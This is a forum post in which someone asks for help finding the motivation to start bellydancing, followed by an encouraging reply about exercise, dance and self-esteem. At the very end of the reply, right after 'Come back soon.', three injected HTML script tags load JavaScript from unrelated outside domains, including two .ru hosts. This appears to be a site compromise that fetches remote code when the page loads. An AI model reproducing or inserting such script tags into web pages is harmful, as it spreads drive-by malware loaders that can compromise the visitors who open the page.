I'm a sham when it comes to expressing my interests to other people. I tell them that my interest is bellydancing, but the truth is that I don't dance! Why not? Because I seriously lack motivation and I don't know why. I tell myself that now is the time to start dancing and another year will go by and I still haven't started. I have tons of CDs, books and DVDs on bellydance. I even have a costume. So why can't I actually start to learn to dance? I keep telling myself that it's time constraints (due to a full-time job and a marriage), but I'm sure that it goes deeper than that. Please help me figure out how to get motivated. Bellydancing is something that I've wanted to do for years.

Well, you won't lose weight if you don't go to the gym or your dance class. Instead you'll just feel worse because you are losing your skills and others will be progressing ahead of you, which will then be the new excuse when you come back "I let so much time go, I can't catch up." The longer you don't go, the longer it'll be before you get started and the worse you'll feel about yourself. Working out & dancing are not that different. Losing weight should not be the focus. The focus should be on getting healthy and getting in touch with your body. If you start to move, either by dance or exercise, you'll start to feel better about yourself. I've seen full bodied women who move beautifully and sticks who can't move to save their lives & every thing in between. Moving through dance or exercise will increase your self awareness amd self-esteem. Come back soon.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
